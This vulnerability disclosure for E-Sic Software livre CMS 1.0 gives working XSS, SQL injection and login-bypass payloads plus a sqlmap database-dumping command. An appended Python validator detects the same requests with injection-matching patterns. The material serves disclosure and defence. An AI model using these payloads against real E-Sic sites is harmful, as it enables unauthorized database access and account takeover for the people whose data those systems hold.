E-Sic Software livre CMS 1.0 Cross Site Scripting / SQL Injection
Posted on 13 October 2017
# Exploit Title: E-Sic Software livre CMS - Cross Site Scripting
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: Kali Linux, Windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: http://whiteboyz.xyz/esic-software-publico-xss.html

The XSS is present in the requester registration area, where it is possible to inject code through the input that receives the user's name.

---------------------------------------------------------------------

Url: http://localhost/esic/index/
POST: http://localhost/cadastro/index.php
DATA:
tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
uf=&numero=&complemento=&acao=Salvar


# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: Kali Linux, Windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: http://whiteboyz.xyz/esic-software-publico-sql-injection.html

The vulnerability is in the zip code search script.

---------------------------------------------------------------------

Url: http://localhost/esiclivre/restrito/inc/buscacep.php
DATA:

Parameter: f (POST)

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr

Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: f=test' UNION ALL SELECT 3344,3344,CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),3344,3344,3344#


# Exploit Title: E-Sic Software livre CMS - Blind SQL Injection
# Date: 12/10/2017
# Exploit Author: Guilherme Assmann
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: Kali Linux, Windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: https://k33r0k.wordpress.com/2017/10/12/e-sic-sql-injection/#more-398

The vulnerability is in the search function of the private area of e-sic, reachable without authentication.

---------------------------------------------------------------------

PoC:

Url: http://vulnerable/esiclivre/restrito/inc/lkpcep.php?q=1
Parameter: q (GET)
Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT DISTINCT(HEX(IFNULL(CAST(schema_name AS CHAR),0x20))) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 13,1),11,1))>1,0,5)))))oslN)-- UACx

sqlmap -v 5 -u "http://localhost/esiclivre/restrito/inc/lkpcep.php?q=1" --level 5 --random-agent --hex --dbs


# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: Kali Linux, Windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: http://whiteboyz.xyz/esic-software-publico-sql-injection.html

The vulnerability is in the password reset parameter of the software, where we can send SQL and interact directly with the database.

"Informe seu CPF ou CNPJ para enviarmos nova senha:"

---------------------------------------------------------------------

Url: http://vulnerablesite/esic/reset/
POST: cpfcnpj=test&btsub=Enviar

Parameter: cpfcnpj (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL-- GJkR&btsub=Enviar


# Exploit Title: E-Sic Software livre CMS - Authentication Bypass
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: Kali Linux, Windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
# More information: http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html

The vulnerability is in the login area of e-sic, where we can enter the panel using only crafted values for the username and password parameters.

---------------------------------------------------------------------

PoC:

Url: http://vulnsite/esic/index/
User: '=''or'
Pass: '=''or'

POST: http://vulnsite/esic/index/index.php
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar
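Every finding above comes down to a request parameter reaching a SQL query or an HTML page unchecked. The following is an added example, not part of the advisories or of the E-Sic code: a small validator that applies strict allow-lists to the fields that have a fixed format (the reset form's cpfcnpj, which is a CPF of 11 digits or a CNPJ of 14 digits, and the zip-code lookups buscacep.php 'f' and lkpcep.php 'q', a CEP being 8 digits) and heuristic injection markers to the free-text login and registration fields. Parameter names and paths are taken from the advisories; the sample request bodies, the CPF- and CEP-shaped values and the treatment of 'q' as a partial-CEP prefix are constructed assumptions. The heuristics detect the request shapes shown above; the actual fix remains parameterized queries and output encoding in the PHP scripts.

```python
"""Request-parameter validation for the endpoints named in the E-Sic advisories.

Added example, not part of the original advisory. Parameter names and paths come
from the advisory; the sample request bodies below are constructed. The digit-count
rules encode the Brazilian identifier formats: CPF = 11 digits, CNPJ = 14 digits,
CEP (zip code) = 8 digits.
"""
import re
from urllib.parse import parse_qs

# Fields that should never contain anything but digits: the reset form's CPF/CNPJ
# and the zip-code lookups (buscacep.php 'f', lkpcep.php 'q'). 'q' is used as a
# lookup prefix in the advisory (q=1), so a partial CEP is allowed there (assumption).
DIGIT_ONLY = {
    "cpfcnpj": re.compile(r"\d{11}|\d{14}"),
    "f": re.compile(r"\d{8}"),
    "q": re.compile(r"\d{1,8}"),
}

# Free-text fields from the login, reset and registration forms. These cannot be
# allow-listed as tightly, so they get heuristic injection markers instead. The
# real fix for them is parameterized queries and output encoding; this only detects.
FREE_TEXT = {"login", "password", "nome", "email", "confirmeemail"}

INJECTION_MARKERS = [
    (re.compile(r"<\s*script", re.I), "script tag"),
    (re.compile(r"\b(union|select|sleep|concat)\b", re.I), "SQL keyword"),
    (re.compile(r"--|/\*"), "SQL comment"),
    # a quote directly followed by a comparison or boolean operator, as in '=''or'
    (re.compile(r"'\s*(=|\|\||or\b|and\b)", re.I), "quote followed by SQL operator"),
]


def extract_params(method, path, body):
    """Decode the request's parameters (query string for GET, body for POST) into a
    dict of name -> first value. parse_qs undoes percent-encoding and '+' for us."""
    query = path.partition("?")[2] if method == "GET" else body
    return {name: values[0] for name, values in parse_qs(query, keep_blank_values=True).items()}


def check_request(method, path, body):
    """Return a list of (parameter, reason) findings; an empty list means every
    known parameter passed its allow-list and tripped no injection marker."""
    findings = []
    for name, value in extract_params(method, path, body).items():
        if name in DIGIT_ONLY:
            if not DIGIT_ONLY[name].fullmatch(value):
                findings.append((name, "expected digits only"))
        elif name in FREE_TEXT:
            for marker, reason in INJECTION_MARKERS:
                if marker.search(value):
                    findings.append((name, reason))
                    break  # one reason per field is enough
    return findings


# Constructed sample traffic: four legitimate requests (CPF- and CEP-shaped values are
# made up) and the four request shapes from the advisories (login bypass, reset SQLi,
# buscacep time-based SQLi, registration XSS).
SAMPLE_REQUESTS = [
    ("POST", "/esic/index/index.php", "login=operador&password=s3cret&btsub=Entrar"),
    ("POST", "/esic/index/index.php", "login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar"),
    ("POST", "/esic/reset/", "cpfcnpj=12345678901&btsub=Enviar"),
    ("POST", "/esic/reset/", "cpfcnpj=test%27+UNION+ALL+SELECT+NULL%2CNULL--+x&btsub=Enviar"),
    ("POST", "/esiclivre/restrito/inc/buscacep.php", "f=01310100"),
    ("POST", "/esiclivre/restrito/inc/buscacep.php", "f=test%27+OR+SLEEP%285%29+AND+%27a%27%3D%27a"),
    ("GET", "/esiclivre/restrito/inc/lkpcep.php?q=1", ""),
    ("POST", "/cadastro/index.php", "tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=a%40example.com"),
]


def scan(requests):
    """Run check_request over (method, path, body) tuples and keep only flagged requests."""
    flagged = []
    for method, path, body in requests:
        findings = check_request(method, path, body)
        if findings:
            flagged.append((method, path, findings))
    return flagged


if __name__ == "__main__":
    for method, path, findings in scan(SAMPLE_REQUESTS):
        print(f"{method} {path}: {findings}")
```

Run stand-alone, the script lists the four injected requests and stays silent on the four legitimate ones. The quote marker deliberately requires an operator after the quote so that ordinary names such as O'Brien in the registration form are not flagged; the digit-only fields need no such care, because for them anything that is not a number is already wrong.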